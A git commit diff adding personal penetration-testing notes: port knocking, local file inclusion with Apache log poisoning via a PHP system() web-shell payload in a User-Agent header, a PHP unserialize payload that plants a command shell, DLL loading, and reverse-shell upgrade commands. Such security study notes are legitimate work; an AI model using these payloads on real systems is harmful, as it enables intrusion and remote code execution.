notes on reversing

This commit is contained in:
Stefan Friese 2021-11-24 23:52:42 +01:00
parent 469aeb2618
commit 375271ef5d
7 changed files with 68 additions and 4 deletions

View File

@ -0,0 +1,13 @@
# Port Knocking
* Open filtered port behind a firewall by knocking nicely
## Usage
* `knockd`
```sh
knock <target-IP> <magicWords>
```
or
* [arch wiki nmap script](https://wiki.archlinux.org/title/Port_knocking)
* `nc -z`

View File

@ -26,10 +26,17 @@ http://example.com/home?page=/etc/passwd
```sh
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: <TARGETIP>' -H 'User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1'
```
* Follow up with a request to
```HTTP
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
```
* Follow up with a request to
```HTTP
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
```
### /proc/self/fd
* [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2)
* Log poisoning and opening logfile via `/proc/self/fd/xx`.
### Base64 Encoding via PHP
* Circumvent filter via encoding local files included ins a GET parameter value
```http
@ -48,9 +55,11 @@ curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<
* `/root/.ssh/id_rsa`
* `/var/log/apache2/access.log`
* `C:\boot.ini`
* `/proc/self/fd/xx`
## Tricks
* Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4
* Terminate query with `/.`
* `..//..//..//file`, double slashes

View File

@ -0,0 +1,20 @@
# Unserialize
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize/)
* Serialize via
```php
<?php
class FormSubmit {
public $form_file = 'messages.php';
public $message = '<?php
if(isset($_GET[\'cmd\']))
{
system($_GET[\'cmd\']);
}
?>';
}
print urlencode(serialize(new FormSubmit));
?>
```

View File

@ -0,0 +1,9 @@
# DLL Reversing
* Start DLL on its own with the help a wrapper
```C#
HMODULE dll = LoadLibraryA("DLL.DLL");
typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y)
Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName");
Add(1, 2);
```

View File

@ -0,0 +1,4 @@
# Function Decoration
* Done to imported functions in order to do interpositioning and identify the variants of the function.
* [name mangling](https://en.wikipedia.org/wiki/Name_mangling)

Binary file not shown.

View File

@ -1,5 +1,9 @@
# Upgrade Reverse Shell
* [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
* [reverse shell without python](https://www.schtech.co.uk/linux-reverse-shell-without-python/)
* [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)
## Via interpreter
### PHP
* reverse shell
@ -24,6 +28,11 @@ python -c 'import pty; pty.spawn("/bin/bash")'
perl -e 'exec "/bin/sh";'
```
### Script
```sh
/usr/bin/script -qc /bin/bash /dev/null
```
## Next
1. `ctrl` + `z`
2. `stty echo -raw`